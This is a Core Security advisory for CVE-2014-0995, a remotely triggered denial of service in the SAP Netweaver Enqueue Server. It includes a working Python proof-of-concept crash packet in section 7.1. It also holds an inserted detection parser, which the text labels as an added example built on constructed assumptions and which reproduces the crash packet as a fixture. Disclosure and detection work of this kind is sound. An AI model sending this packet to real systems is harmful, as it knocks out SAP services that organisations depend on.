SAP Netweaver Enqueue Server Trace Pattern Denial Of Service

Core Security Technologies, published on packetstormsecurity.com (PACKETSTORM:128726), 2014-10-16

EPSS score: 0.041 (Low), percentile 92.1%

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
  
1. **Advisory Information**

Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL: http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release
  
2. **Vulnerability Information**

Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995
  
3. **Vulnerability Description**

SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. A vulnerability has been found in SAP Netweaver that could allow an unauthenticated, remote attacker to create denial of service conditions. The vulnerability is triggered by sending a specially crafted SAP Enqueue Server packet to remote TCP port 32NN (NN being the SAP system number) of a host running the "Standalone Enqueue Server" service, part of SAP Netweaver Application Server ABAP/Java. The "Standalone Enqueue Server" is a critical component of a SAP Netweaver installation in terms of availability, so taking it down renders the whole SAP system unresponsive.
  
4. **Vulnerable Packages**  
  
. SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).  
. SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).  
  
Other versions are probably affected too, but they were not checked.  
  
5. **Vendor Information, Solutions and Workarounds**

Martin Gallo proposed the following actions to mitigate the impact of the vulnerability:

Restrict access to the Standalone Enqueue Server service by configuring Access Control Lists [4], and restrict network access to the Standalone Enqueue Server TCP port 32XX (XX being the instance number).

SAP published a security note [3] with the fix.
  
6. **Credits**

This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Advisories Team.
  
7. **Technical Description / Proof of Concept Code**

When the trace level of the service is configured to stop logging when a pattern is found [2], the service does not properly control the amount of recursion, resulting in a stack overflow exception. The vulnerability can be triggered remotely by setting the trace level with a wildcard Trace Pattern. This vulnerability could allow a remote, unauthenticated attacker to conduct a denial of service attack against vulnerable systems, rendering the Enqueue Server unavailable.

The following Python code can be used to trigger the vulnerability:
  
7.1. **Proof of Concept**

/-----
# Python 2 script (uses the print statement and byte strings of Python 2)
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
                  default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port number",
                  default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    # Prepend the 4-byte big-endian length of the payload
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))

print "[*] Sending crash packet"

crash = '\xab\xcd\xe1\x23' # Magic bytes
crash+= '\x00\x00\x00\x00' # Id
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b' # Packet/frag length
crash+= '\x03\x00\x00\x00' # Destination/Opcode/MoreFrags/Type
crash+= 'ENC\x00' # Admin Eye-catcher
crash+= '\x01\x00\x00\x00' # Version
crash+= '#EAA' # Admin Eye-catcher
crash+= '\x01\x00\x00\x00\x00' # Len
crash+= '\x06\x00\x00\x00\x00\x00' # Opcode/Flags/RC
crash+= '#EAE' # Admin Eye-catcher
crash+= '\x01\x04\x00\x00' # Version/Action/Limit/Thread
crash+= '\x00\x00\x00\x00'
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03' # Trace Level
crash+= '\x01' # Logging
crash+= '\x01\x40\x00\x00' # Max file size
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01' # No. patterns
crash+= '\x00\x00\x00\x25#EAH' # Trace Eye-catcher
crash+= '\x01*\x00' # Trace Pattern
crash+= '#EAD' # Trace Eye-catcher

send_packet(connection, crash)
print "[*] Crash sent !"
-----/
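A defender-side view of the same packet, as an added example that is not part of the advisory and not Core Security's code: a small parser that strips the length prefix send_packet() adds, checks the magic bytes and the "ENC" admin eye-catcher, and extracts the trace patterns enclosed by the "#EAH"/"#EAD" eye-catchers, so that a network sensor or a filtering front-end in front of port 32NN can flag a trace-set request carrying a wildcard pattern (the trigger condition described in sections 3 and 7) and let ordinary traffic through. The parser relies only on the eye-catchers the PoC documents; treating the byte before each pattern as framing, the benign "EnqWork" sample, the HTTP sample and the category labels are constructed assumptions, not documented SAP behaviour.

```python
import struct

# Markers taken from the packet layout documented in the advisory's PoC.
MAGIC = b"\xab\xcd\xe1\x23"      # Enqueue Server magic bytes
ADMIN_EYE = b"ENC\x00"           # admin request eye-catcher
TRACE_START = b"#EAH"            # trace section start eye-catcher
TRACE_END = b"#EAD"              # trace section end eye-catcher


def strip_length_prefix(data: bytes):
    """Undo the 4-byte big-endian length prefix that the PoC's send_packet() adds.

    Returns the payload, or None when the prefix disagrees with the data length
    or the payload does not start with the Enqueue Server magic bytes.
    """
    if len(data) < 4:
        return None
    (plen,) = struct.unpack("!I", data[:4])
    payload = data[4:4 + plen]
    if len(payload) != plen or not payload.startswith(MAGIC):
        return None
    return payload


def trace_patterns(payload: bytes):
    """Return the trace pattern strings found between #EAH and #EAD.

    Assumption (not documented by the advisory): each pattern is NUL-terminated
    and preceded by one framing byte (the \\x01 seen in the PoC), so any
    non-printable bytes are dropped before comparing.
    """
    start = payload.find(TRACE_START)
    if start < 0:
        return []
    end = payload.find(TRACE_END, start)
    if end < 0:
        return []
    region = payload[start + len(TRACE_START):end]
    parts = [p for p in region.split(b"\x00") if p]
    return ["".join(chr(b) for b in p if 32 <= b < 127) for p in parts]


def classify(data: bytes) -> str:
    """Label one TCP message seen on the 32NN port (label names are constructed)."""
    payload = strip_length_prefix(data)
    if payload is None:
        return "not-enqueue"
    if ADMIN_EYE not in payload:
        return "enqueue-non-admin"
    patterns = trace_patterns(payload)
    if any("*" in p for p in patterns):
        return "admin-trace-wildcard"   # the CVE-2014-0995 trigger condition
    if patterns:
        return "admin-trace"
    return "admin-other"


# Constructed fixture: the fields between the length words and the trace
# pattern, copied from the layout the advisory's PoC documents (68 bytes).
_MIDDLE = (
    b"\x03\x00\x00\x00"                     # destination / opcode / more-frags / type
    b"ENC\x00"                              # admin eye-catcher
    b"\x01\x00\x00\x00"                     # version
    b"#EAA" b"\x01\x00\x00\x00\x00"         # eye-catcher, len
    b"\x06\x00\x00\x00\x00\x00"             # opcode / flags / rc
    b"#EAE" b"\x01\x04\x00\x00"             # eye-catcher, version / action / limit / thread
    b"\x00\x00\x00\x00"
    b"\x00\x00\x00\x03\x00\x00\x00\x03"     # trace level
    b"\x01" b"\x01\x40\x00\x00"             # logging, max file size
    b"\x00\x00\x00\x01\x00\x00\x00\x01"     # number of patterns
    b"\x00\x00\x00\x25#EAH"                 # trace eye-catcher
)

# 91-byte (0x5b) payload with the bare wildcard pattern shown in the advisory,
# including the outer length prefix that send_packet() prepends.
WILDCARD_SAMPLE = (b"\x00\x00\x00\x5b" + MAGIC + b"\x00\x00\x00\x00"
                   + b"\x00\x00\x00\x5b\x00\x00\x00\x5b" + _MIDDLE
                   + b"\x01*\x00" + TRACE_END)
# 97-byte (0x61) payload with a constructed literal pattern name instead of a wildcard.
BENIGN_SAMPLE = (b"\x00\x00\x00\x61" + MAGIC + b"\x00\x00\x00\x00"
                 + b"\x00\x00\x00\x61\x00\x00\x00\x61" + _MIDDLE
                 + b"\x01EnqWork\x00" + TRACE_END)
# Unrelated traffic arriving on the same port (constructed).
OTHER_SAMPLE = b"GET / HTTP/1.0\r\n\r\n"


if __name__ == "__main__":
    for name, sample in (("wildcard", WILDCARD_SAMPLE),
                         ("benign", BENIGN_SAMPLE),
                         ("http", OTHER_SAMPLE)):
        print(f"{name}: {classify(sample)}")
```

The classifier deliberately validates the outer length word against the bytes actually received before looking for eye-catchers, so a truncated or garbage message is reported as "not-enqueue" rather than being scanned for markers; a real sensor would feed it reassembled TCP stream data rather than single segments.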
  
8. **Report Timeline**

. 2014-06-02:
Initial notification sent to SAP, including technical description to reproduce the vulnerability. Publication date set to Jun 30, 2014.

. 2014-06-03:
Vendor notifies that the tracking number 1153917-2014 was created for this issue.

. 2014-06-26:
Core Security requests SAP to inform the status of the advisory.

. 2014-06-30:
The vendor informs they were not able to reproduce the issue and they request additional details and a proof of concept.

. 2014-06-30:
Core Security sends SAP a full description of the vulnerability including a python script to trigger it.

. 2014-07-11:
Core Security asks if the vendor was able to trigger the vulnerability. Additionally we requested to set a publication date for the advisory based on the release of a fix.

. 2014-07-14:
The vendor informs they were able to reproduce the issue but they will not be able to provide a timeline for the fix at the time. They inform they will work with high priority on it and will inform us of the planned fix release date.

. 2014-08-12:
Core Security asks if the vendor was able to develop a fix and if they have a possible timeline for its availability.

. 2014-08-13:
The vendor informs that the fix is undergoing quality checks. They also inform that they can't provide an exact date of publication yet. They also request a 3 months grace period once the patch is available.

. 2014-08-13:
Core Security informs SAP that after we get notice that the fix is available to the public we will publish the advisory accordingly and will not wait for the 3 months of grace as requested, because that is not our standard policy.

. 2014-08-18:
The vendor informs that the fix is going to be released with the October patch day, on Tuesday, October 14, 2014.

. 2014-10-14:
The vendor publishes the fix under the security note 2042845.

. 2014-10-15:
Core Security releases the advisory.
  
9. **References**

[1] http://www.sap.com/platform/netweaver/index.epx
[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075
  
10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
  
11. **About Core Security**

Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
  
12. **Disclaimer**

The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
  
13. **PGP/GPG Keys**

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
  
  